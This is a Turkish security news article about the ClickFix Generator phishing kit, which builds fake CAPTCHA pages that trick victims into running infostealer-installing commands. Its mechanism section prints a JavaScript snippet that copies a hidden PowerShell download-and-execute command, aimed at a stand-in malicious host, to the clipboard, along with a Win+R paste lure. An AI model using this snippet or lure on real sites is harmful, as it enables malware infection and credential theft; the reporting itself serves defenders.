Siber güvenlik topluluğu, “ClickFix” saldırı sayfalarının oluşturulmasını otomatikleştiren ve minimum düzeyde teknik uzmanlığa sahip tehdit aktörlerinin karmaşık sosyal mühendislik tuzaklarını devreye sokmasına olanak tanıyan yeni bir kimlik avı araç setinin hızla ortaya çıkışına tanık oldu.
IUAM ClickFix Oluşturucu olarak adlandırılan bu kimlik avı kiti, gerekli tüm yapılandırma seçeneklerini (sayfa başlığı, etki alanı, doğrulama istemleri ve pano talimatları) web tabanlı bir arayüzde birleştirir.
Sonuç, meşru tarayıcı doğrulama zorlukları gibi görünen, kurbanları kötü amaçlı yazılım yerleştiren komutları yürütmeye kandıran kötü amaçlı sayfalar oluşturmak için anahtar teslim bir çözümdür.
.webp)
İlk olarak Temmuz 2025’in başlarında gözlemlenen ClickFix Generator’ın ilk örnekleri, hizmet olarak kimlik avı aboneliklerinin tanıtımını yapan yer altı forumlarında ortaya çıktı.
Kampanya raporları, saldırganların, kimlik avı katmanlarını sorunsuz bir şekilde oluşturmak için mevcut web sitelerine karartılmış JavaScript enjekte ederek, ana bilgisayar ortamları olarak güvenliği ihlal edilmiş alanlardan yararlandığını gösteriyor.
Bu sayfalar genellikle Cloudflare tarzı doğrulama kontrollerini taklit eder ve kullanıcılara, insan olduklarını kanıtlama kisvesi altında komutları kopyalayıp sistem konsollarına yapıştırmaları talimatını verir.
Sosyal mühendislik uzun süredir kimlik avının temelini oluştursa da ClickFix yaklaşımı, ağdaki ve uç nokta katmanlarındaki otomatik güvenlik kontrollerini atlayarak manuel kullanıcı eylemlerini birincil enfeksiyon vektörü olarak silah haline getiriyor.
Palo Alto Networks analistleri, düzinelerce gözlemlenen alan adı arasındaki görsel farklılıklara rağmen, tüm kimlik avı sayfalarının neredeyse aynı HTML yapısını ve kötü amaçlı komutları kurbanın panosuna kopyalamak için tıklama olaylarını engelleyen JavaScript olay işleyicilerini paylaştığını belirtti.
Bazı değişkenler, talimatları Windows veya macOS ana bilgisayarlarına uyarlamak için temel işletim sistemi algılama mantığını (navigator.userAgent’ı ayrıştırma) içerirken, diğerleri herhangi bir masaüstü platformunda başarılı olan tek tip talimatlar sunar.
Gerçek dünyadaki kampanyalar, Windows sistemlerinde DeerStealer bilgi hırsızlığını ve Base64 kodlu kabuk komutları aracılığıyla Odyssey macOS bilgi hırsızlığını sağladı.
Bu kampanyaların operasyonel etkisi önemlidir. Saldırganlar, yürütme yükünü kurbanın ellerine bırakarak, normalde otomatik yük indirmelerini engelleyen içerik inceleme motorlarından ve tarayıcı sanal alanlarından kaçarlar.
Kuruluşlar, kurbanların yanlışlıkla çok aşamalı toplu veya kabuk komut dosyalarını çalıştırdığı, bunun da kimlik bilgileri hırsızlığına ve kalıcı arka kapılara yol açtığı çok sayıda olay müdahalesi gerçekleştirdiğini bildirdi.
ClickFix Oluşturucunun sağladığı azaltılmış giriş engeli, işletmelere ve kamu sektörü hedeflerine yönelik hedefli kimlik avı kampanyaları başlatabilecek aktör havuzunu genişletme tehdidinde bulunuyor.
Enfeksiyon Mekanizmasının Derinlemesine İncelemesi
Temel olarak, ClickFix sayfaları, tıklama işleyicisini sahte bir CAPTCHA onay kutusuna bağlayan hafif bir JavaScript pasajına dayanır.
.webp)
Kurban onay kutusunu tıkladığında işleyici şuna benzer bir kod çalıştırır:
function onVerifyClick() {
const cmd = "powershell -NoP -NonI -W Hidden -Exec Bypass -C \"IEX (New-Object Net.WebClient).DownloadString('http://malicious.domain/payload.ps1')\"";
navigator.clipboard.writeText(cmd);
showPopover("Press Win+R, paste, and hit Enter to complete verification");
}Bu kod parçası, doğrudan jeneratörün arayüzünde Base64 kodlamasından özel sembol değiştirmeye kadar uzanan yapılandırılabilir ön ayarları kullanarak içeriğini gizler.
Kopyalandıktan sonra kurban, uygun kabuğu başlatmak, kötü amaçlı komutu yapıştırmak ve yanlışlıkla kötü amaçlı yazılım yükünü kaldırmak için bir dizi tuş vuruşuyla (Windows’ta Win+R veya macOS’ta Command+Space) yönlendirilir.
Bu yaklaşım, yerel işletim sistemi iletişim pencerelerinden yararlanarak tarayıcı güvenlik uyarılarını ve içerik filtrelemeyi atlatır ve uç nokta koruma platformlarının tespitini oldukça zorlaştırır.
Kitin kod tabanındaki sürekli güncellemeler, pano komutlarının dinamik olarak oluşturulması, başarısız yürütme denemeleri üzerine popover katmanlarının geçici olarak bastırılması ve barındırmanın güvenliği ihlal edilmiş siteler arasında dağıtılması için çok alanlı yük dengeleme gibi ek kaçınma taktiklerini ortaya çıkardı.
IUAM ClickFix Generator geliştikçe, savunucuların sıkı kullanıcı eğitimine öncelik vermesi ve bu büyüyen tehdidi azaltmak için uç nokta düzeyinde katı komut yürütme politikaları uygulaması gerekir.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
